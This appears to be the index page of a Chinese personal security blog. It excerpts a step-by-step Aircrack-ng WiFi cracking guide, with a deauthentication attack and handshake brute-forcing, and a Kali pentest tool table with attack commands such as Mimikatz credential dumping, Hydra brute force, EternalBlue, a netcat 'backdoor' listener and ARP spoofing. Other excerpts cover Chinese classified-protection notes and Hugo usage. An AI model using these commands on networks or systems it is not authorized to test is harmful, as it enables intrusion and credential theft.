Levin的小屋

云空调

Levin 发布于 2024-05-11 收录于 Categories

学习爱好者

使用Aircrack-ng破解WiFi密码

Levin 发布于 2023-04-25 收录于 Kali WIFI

快速通道

1.安装： apt-get isntall aircrack-ng
2.查看网卡名字：ifconfig
3.设置网卡为监听模式：airmon-ng  start wlan0
4.扫描附近的WIFI：airodump-ng  wlan0mon
5.选定一个路由器，并监听其流量：airodump-ng -w tplink -c 11 --bssid FF:FF:FF:FF:FF:FF wlan0mon
6.选定连接的一个客户端，进行攻击：aireplay-ng -0 0 -a FF:FF:FF:FF:FF:FF -c FF:FF:FF:FF:FF:FF  wlan0mon
7.对抓取到的cap包进行暴力破解：aircrack-ng  -w  password.txt  -b FF:FF:FF:FF:FF:FF handshark-01.cap

详细步骤

1.安装aircrack-ng

sudo apt-get updata
sudo apt-get install aircrack-ng

2.Aircrack-ng 破解WiFi

1.ifconfig查看网卡信息

	ifconfig

2.打开网卡监听模式

使用airmon-ng查看网卡

渗透测试

Levin 发布于 2025-01-19 收录于渗透测试

Kali Linux 渗透测试工具链

1. 信息收集

工具名称	用途	示例命令
Nmap	端口扫描与服务识别	`nmap -sV -sC -oA scan 10.10.11.51`
Masscan	快速全网扫描	`masscan -p1-65535 10.10.11.51 --rate=1000`
Amass	子域名枚举	`amass enum -d sequel.htb`
Sublist3r	多源子域名收集	`sublist3r -d sequel.htb`
DNSenum	DNS 信息枚举	`dnsenum sequel.htb`
theHarvester	邮箱/子域名收集	`theHarvester -d sequel.htb -b all`

2. 漏洞扫描

工具名称	用途	示例命令
Nessus	全面漏洞扫描	图形化界面，配置目标 IP 即可
OpenVAS	开源漏洞扫描	`omp -u admin -w password --xml="<target><hosts>10.10.11.51</hosts></target>"`
Nikto	Web 服务漏洞扫描	`nikto -h http://10.10.11.51`
Wapiti	Web 应用漏洞检测	`wapiti -u http://10.10.11.51 -v 2`
Lynis	本地系统安全审计	`lynis audit system`

3. 漏洞利用

工具名称	用途	示例命令
Metasploit	综合漏洞利用框架	`use exploit/windows/smb/ms17_010_eternalblue`
SQLMap	SQL 注入检测与利用	`sqlmap -u "http://10.10.11.51/login" --data="username=test&password=test"`
ExploitDB	漏洞利用代码库	`searchsploit eternalblue`
Burp Suite	Web 应用漏洞利用	图形化界面，配置代理即可
CrackMapExec	内网渗透工具	`crackmapexec smb 10.10.11.51 -u users.txt -p passwords.txt`

4. 密码破解

工具名称	用途	示例命令
Hashcat	GPU 加速密码破解	`hashcat -m 1000 hashes.txt rockyou.txt`
John the Ripper	多模式密码破解	`john --format=nt hashes.txt`
Hydra	在线密码爆破	`hydra -L users.txt -P passwords.txt ssh://10.10.11.51`
Medusa	多协议密码爆破	`medusa -h 10.10.11.51 -U users.txt -P passwords.txt -M ssh`
CeWL	自定义字典生成	`cewl http://10.10.11.51 -w custom_dict.txt`

5. 后渗透与横向移动

工具名称	用途	示例命令
Mimikatz	Windows 凭证提取	`sekurlsa::logonpasswords`
BloodHound	Active Directory 攻击路径分析	`SharpHound.exe -c All`
Empire	PowerShell 后渗透框架	`usestager launcher powershell`
Cobalt Strike	高级威胁模拟工具	图形化界面，配置监听器即可
Powersploit	PowerShell 渗透工具集	`Invoke-Mimikatz -DumpCreds`

6. 报告生成

工具名称	用途	示例命令
Dradis	渗透测试协作与报告生成	图形化界面，导入扫描结果
Serpico	自动化报告生成工具	图形化界面，配置模板即可
Metasploit	导出扫描结果	`db_export -f xml report.xml`
Faraday	渗透测试协作平台	图形化界面，集成多工具结果

7. 无线网络渗透

工具名称	用途	示例命令
Aircrack-ng	无线网络破解	`aircrack-ng -w rockyou.txt capture.cap`
Kismet	无线网络探测	`kismet -c wlan0`
Reaver	WPS 破解	`reaver -i wlan0mon -b 00:11:22:33:44:55`
Wifite	自动化无线攻击工具	`wifite --wps --bully`

8. 社会工程学

工具名称	用途	示例命令
Social-Engineer Toolkit (SET)	社会工程学攻击框架	图形化界面，选择攻击模块即可
Phishing Frenzy	钓鱼攻击平台	图形化界面，配置钓鱼页面
Gophish	开源钓鱼框架	图形化界面，配置邮件模板

9. 逆向工程

工具名称	用途	示例命令
Ghidra	逆向工程分析	图形化界面，加载二进制文件
Radare2	命令行逆向工具	`r2 -A binary_file`
IDA Pro	高级逆向工程工具	图形化界面，加载二进制文件
Binwalk	固件分析与提取	`binwalk firmware.bin`

10. 其他实用工具

工具名称	用途	示例命令
Wireshark	网络流量分析	图形化界面，加载抓包文件
Tcpdump	命令行抓包工具	`tcpdump -i eth0 -w capture.pcap`
Netcat	网络调试与后门	`nc -lvp 4444`
Ettercap	ARP 欺骗与中间人攻击	`ettercap -T -i eth0 -M arp`

🔧 工具链集成与自动化

1. 使用自动化框架

AutoRecon：

https://wanqian6311.github.io/blog/images/dengbaoceshixuexibiji/img/Pasted-image20250705225955.png

等级保护（第一阶段）学习笔记

Levin 发布于 2024-03-20

等级保护（第一阶段）学习笔记

网络安全等级保护的基本含义

等级保护是指对国家重要信息、法人和其他组织及公民的专有信息以及公开信息的存储、传输、处理这些信息的系统分等级实行安全保护
对信息系统中使用信息安全产品实行按等级管理；对信息系统中发生的信息安全事件分等级响应、处置。

突出问题

信息安全滞后于信息化发展
信息安全阻碍了信息化发展

存在问题

大多数单位虽然采用防火墙作为内外网的边界防护设备
重视外部攻击与入侵，忽视内部的非法行为
偏重产品，忽视体系和管理
关键技术，产品受制于人

外部因素————形式所迫

攻击技术越来越复杂、入侵条件越来越简单
来自境外敌对势力的入侵、攻击、破坏日益严重

内部因素————国情所需

信息安全保障工作基础比较薄弱
基础信息网络和重要信息系统安全隐患严重
是维护国家安全的需要，信息安全是国家安全的重要组成部分

2014年习总书记成立“网络安全与信息化领导小组” 第一次会议指出：没有网络安全就没有国家安全，没有信息化就没有现代化，且规划了构建网络安全的短期目标和长期安全

Hugo使用简单命令

Levin 发布于 2024-03-02 收录于 Hugo

Hugo使用简单命令

新建一个网站

hugo new site quickstart

新建一篇文章

hugo new content posts/*****.md

预览网站

hugo server --buildDrafts
hugo server -D

浏览器输入http://localhost:1313 或者127.0.0.1:1313 预览网站

生成page文件

hugo

默认情况下,所有文章和页面均作为草稿创建.如果想要渲染这些页面,请从元数据中删除属性 draft: true, 设置属性 draft: false 或者为 hugo 命令添加 -D/–buildDrafts 参数.

Hugo中Loveit主题配置文档

Levin 发布于 2024-03-02 收录于 Hugo

主题配置文档

文档链接：https://hugoloveit.com/zh-cn/posts/